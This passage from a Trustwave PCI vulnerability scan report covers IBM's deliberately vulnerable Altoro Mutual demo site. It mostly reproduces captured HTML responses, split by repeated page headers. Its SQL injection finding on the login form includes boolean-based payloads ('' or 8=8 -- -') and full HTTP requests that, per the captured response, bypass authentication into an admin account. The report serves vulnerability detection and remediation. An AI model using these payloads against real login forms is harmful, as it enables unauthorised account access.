<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 191 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 192 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5" href="index.jsp?
content=personal_investments.htm">Investments &amp;
Insurance</a></li>
<li><a id="MenuHyperLink6" href="index.jsp?
content=personal_other.htm">Other Services</a></li>
</ul>

<a id="CatLink2" class="subheader" href="index.jsp?


content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7" href="index.jsp?
content=business_deposit.htm">Deposit Products</a></li>
<li><a id="MenuHyperLink8" href="index.jsp?

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 193 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
content=business_lending.htm">Lending Services</a></li>
<li><a id="MenuHyperLink9" href="index.jsp?
content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10" href="index.jsp?
content=business_insurance.htm">Insurance</a></li>
<li><a id="MenuHyperLink11" href="index.jsp?
content=business_retirement.htm">Retirement</a></li>
<li><a id="MenuHyperLink12" href="index.jsp?
content=business_other.htm">Other Services</a></li>
</ul>

<a id="CatLink3" class="subheader" href="index.jsp?


content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13" href="index.jsp?
content=inside_about.htm">About Us</a></li>
<li><a id="MenuHyperLink14" href="index.jsp?
content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15" href="cgi.exe"
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 194 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<div class="fl" style="width: 99%;">

<h1>Online Banking Login</h1>

<!-- To get the latest admin login, please contact


SiteOps at 415-555-6159 -->
<p><span id="_ctl0__ctl0_Content_Main_message"
style="color:#FF0066;font-size:12pt;font-weight:bold;">
Login Failed: We're sorry, but this username or
password was not found in our system. Please try again.
</span></p>

<form action="doLogin" method="post" name="login"


id="login" onsubmit="return (confirminput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid"
value="" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type="password" id="passw" name="
passw" style="width: 150px;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 195 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" name="btnSubmit"
value="Login">
</td>
</tr>
</table>
</form>

</div>

<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}

function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 196 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>

<!-- BEGIN FOOTER -->

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 197 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>
</div>

</body>
</html>
<!-- END FOOTER -->

Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 198 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.

Please note that the listing of SQLi vulnerabilities is not an exhaustive


list, and other SQLi vulnerabilities may exist in the application.

14 SQL Injection Vulnerability 7.5 High Fail URL: http://65.61.137.117:8080/doLogin


Port: tcp/8080

A SQL injection vulnerability (SQLi) was identified in this web


application. SQL injection is when modified SQL syntax is supplied to a
user defined parameter to have it query the SQL database directly,
which is not the desired intent of the web application. A simple proof
of concept example of this would be for a user to supply "' or SELECT
DATABASES;--" to a user defined parameter and then upon submission,
a list of databases on the system would be supplied for the user
because the SQL query was interpreted directly on the SQL server
instance. SQL injection can be found in many different forms and
combinations so the full request and response that was used
demonstrate this vulnerability has been provided below as evidence.

All SQL Injection vulnerabilities are considered non-compliant by PCI.

CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 199 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection

Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://65.61.137.117:8080/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://65.61.137.117:8080/doLogin HTTP/1.1
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6706
Date: Tue, 06 Aug 2019 04:35:47 GMT

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 200 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<!-- BEGIN HEADER -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 201 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

<div id="wrapper" style="width: 99%;">


<!-- MEMBER TOC BEGIN -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 202 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<table cellspacing="0" width="100%">

<td valign="top" class="cc br bb">


<br style="line-height: 10px;"/>
<b>I WANT TO ...</b>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="/bank/main.jsp">View
Account Summary</a></li>
<li><a id="MenuHyperLink2" href="/bank/transaction.jsp"
>View Recent Transactions</a></li>
<li><a id="MenuHyperLink3" href="/bank/transfer.jsp"
>Transfer Funds</a></li>
<!-- <li><a id="MenuHyperLink3" href="
/bank/stocks.jsp">Trade Stocks</a></li>-->

<li><a id="MenuHyperLink4" href="/bank/queryxpath.jsp"


>Search News Articles</a></li>
<li><a id="MenuHyperLink5" href="/bank/customize.jsp"
>Customize Site Language</a></li>
</ul>

<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 203 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

</ul>
</span>

</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">

<div class="fl" style="width: 99%;">

<h1>Hello Admin User


</h1>

<p>
Welcome to Altoro Mutual Online.
</p>

<form name="details" method="get" action="


showAccount">
<table border="0">
<TR valign="top">
<td>View Account Details:</td>
<td align="left">
<select size="1" name="listAccounts" id="
listAccounts">
<option value="800000" >800000
Corporate</option>
<option value="800001" >800001 Checking</option>
<option value="800002" >800002 Savings</option>
<option value="800003" >800003 Checking</option>
<option value="800004" >800004 Savings</option>

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 204 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<option value="800005" >800005 Checking</option>
<option value="800006" >800006 Savings</option>
<option value="800007" >800007 Checking</option>
<option value="4539082039396288" >4539082039396288 Credit
Card</option>
<option value="4485983356242217" >4485983356242217 Credit
Card</option>

</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
href='apply.jsp'>Here</a> to apply.
</td></tr></table></span></td>
</tr>
</table>
</form>

</div>
</td>
</div>

<!-- BEGIN FOOTER -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 205 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
&nbsp;&nbsp;|&nbsp;&nbsp;
&copy;&nbsp;2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right">&nbsp;<a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
take advantage of advanced features</span></span>
<br><br><br>
<div class="disclaimer">
The AltoroJ website is published by IBM Corporation for the sole
purpose of
demonstrating the effectiveness of IBM products in detecting web
application
vulnerabilities and website defects. This site is not a real banking
site. Similarities,
if any, to third party products and/or websites are purely
coincidental. This site is
provided "as is" without warranty of any kind, either express or
implied. IBM does

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 206 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
not assume any risk in relation to your use of this website. For
more information,
please go to <a id="HyperLink7" href="http://www-142.ibm.
com/software/products/us/en/subcategory/SWI10" >http://www-142.
ibm.com/software/products/us/en/subcategory/SWI10</a>.<br /><br
/>

Copyright &copy; 2008, 2019, IBM Corporation, All rights


reserved.
</div>
</div>

</body>
</html>
<!-- END FOOTER -->
False Request: POST http://65.61.137.117:8080/doLogin HTTP/1.1
Origin: http://65.61.137.117:8080
Upgrade-Insecure-Requests: 1
Referer: http://65.61.137.117:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded

uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:35:47 GMT

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 207 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<!-- BEGIN HEADER -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">

<div id="header" style="margin-bottom:5px; width: 99%;">


<form id="frmSearch" method="get" action="/search.jsp">
<table width="100%" border="0" cellpadding="0"
cellspacing="0">
<tr>
<td rowspan="2"><a id="HyperLink1" href="
/index.jsp"><img src="/images/logo.gif" width=283
height=80/></a></td>
<td align="right" valign="top">
<a id="LoginLink" href="/logout.jsp"><font
style="font-weight: bold; color: red;">Sign Off</font></a> | <a id="
HyperLink3" href="/index.jsp?content=inside_contact.htm">Contact
Us</a> | <a id="HyperLink4" href="/feedback.jsp">Feedback</a> |

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 208 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<label for="txtSearch">Search</label>
<input type="text" name="query" id="query" accesskey="S" />
<input type="submit" value="Go" />
</td>
</tr>
<tr>
<td align="right" style="background-image:
url('/images/gradient.jpg');padding:0px;margin:0px;"><img src="
/images/header_pic.jpg" alt="" width=354 height=60/></td>
</tr>
</table>
</form>
</div>

<table cellspacing="0" width="100%">


<tr>
<td width="25%" class="bt br bb"><div id="Header1"><img id="
Image1" src="/images/pf_lock.gif" width=12 height=14 style="vertical-
align: bottom;" alt="Secure Login"/> &nbsp; <a id="AccountLink"
href="/bank/main.jsp" class="focus" >MY ACCOUNT</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header2"><a id="
LinkHeader2" class="focus" href="/index.jsp?content=personal.htm"
>PERSONAL</a></div></td>
<td width="25%" class="cc bt br bb"><div id="Header3"><a id="
LinkHeader3" class="focus" href="/index.jsp?content=business.htm"
>SMALL BUSINESS</a></div></td>
<td width="25%" class="cc bt bb"><div id="Header4"><a id="
LinkHeader4" class="focus" href="/index.jsp?content=inside.htm"
>INSIDE ALTORO MUTUAL</a></div></td>
</tr>
<tr>

<!-- END HEADER -->

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 209 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status

<div id="wrapper" style="width: 99%;">

<!-- TOC BEGIN -->


<td valign="top" class="cc br bb">
<br style="line-height: 10px;"/>

<a id="CatLink1" class="subheader" href="index.jsp?


content=personal.htm">PERSONAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink1" href="index.jsp?
content=personal_deposit.htm">Deposit Product</a></li>
<li><a id="MenuHyperLink2" href="index.jsp?
content=personal_checking.htm">Checking</a></li>
<li><a id="MenuHyperLink3" href="index.jsp?
content=personal_loans.htm">Loan Products</a></li>
<li><a id="MenuHyperLink4" href="index.jsp?
content=personal_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink5" href="index.jsp?
content=personal_investments.htm">Investments &amp;
Insurance</a></li>
<li><a id="MenuHyperLink6" href="index.jsp?
content=personal_other.htm">Other Services</a></li>
</ul>

<a id="CatLink2" class="subheader" href="index.jsp?


content=business.htm">SMALL BUSINESS</a>
<ul class="sidebar">
<li><a id="MenuHyperLink7" href="index.jsp?
content=business_deposit.htm">Deposit Products</a></li>
<li><a id="MenuHyperLink8" href="index.jsp?

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 210 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
content=business_lending.htm">Lending Services</a></li>
<li><a id="MenuHyperLink9" href="index.jsp?
content=business_cards.htm">Cards</a></li>
<li><a id="MenuHyperLink10" href="index.jsp?
content=business_insurance.htm">Insurance</a></li>
<li><a id="MenuHyperLink11" href="index.jsp?
content=business_retirement.htm">Retirement</a></li>
<li><a id="MenuHyperLink12" href="index.jsp?
content=business_other.htm">Other Services</a></li>
</ul>

<a id="CatLink3" class="subheader" href="index.jsp?


content=inside.htm">INSIDE ALTORO MUTUAL</a>
<ul class="sidebar">
<li><a id="MenuHyperLink13" href="index.jsp?
content=inside_about.htm">About Us</a></li>
<li><a id="MenuHyperLink14" href="index.jsp?
content=inside_contact.htm">Contact Us</a></li>
<li><a id="MenuHyperLink15" href="cgi.exe"
>Locations</a></li>
<li><a id="MenuHyperLink16" href="index.jsp?
content=inside_investor.htm">Investor Relations</a></li>
<li><a id="MenuHyperLink17" href="index.jsp?
content=inside_press.htm">Press Room</a></li>
<li><a id="MenuHyperLink18" href="index.jsp?
content=inside_careers.htm">Careers</a></li>
<li><a id="MenuHyperLink19" href="
subscribe.jsp">Subscribe</a></li>
</ul>
</td>
<!-- TOC END -->

<td valign="top" colspan="3" class="bb">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 211 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
<div class="fl" style="width: 99%;">

<h1>Online Banking Login</h1>

<!-- To get the latest admin login, please contact


SiteOps at 415-555-6159 -->
<p><span id="_ctl0__ctl0_Content_Main_message"
style="color:#FF0066;font-size:12pt;font-weight:bold;">
Login Failed: We're sorry, but this username or
password was not found in our system. Please try again.
</span></p>

<form action="doLogin" method="post" name="login"


id="login" onsubmit="return (confirminput(login));">
<table>
<tr>
<td>
Username:
</td>
<td>
<input type="text" id="uid" name="uid"
value="" style="width: 150px;">
</td>
<td>
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type="password" id="passw" name="
passw" style="width: 150px;">

Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 212 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06

ASV Scan Report Vulnerability Details

demo.testfire.net (Jen's PCI Test)


CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
</td>
</tr>
<tr>
<td></td>
<td>
<input type="submit" name="btnSubmit"
value="Login">
</td>
</tr>
</table>
</form>

</div>

<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
}
}

function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
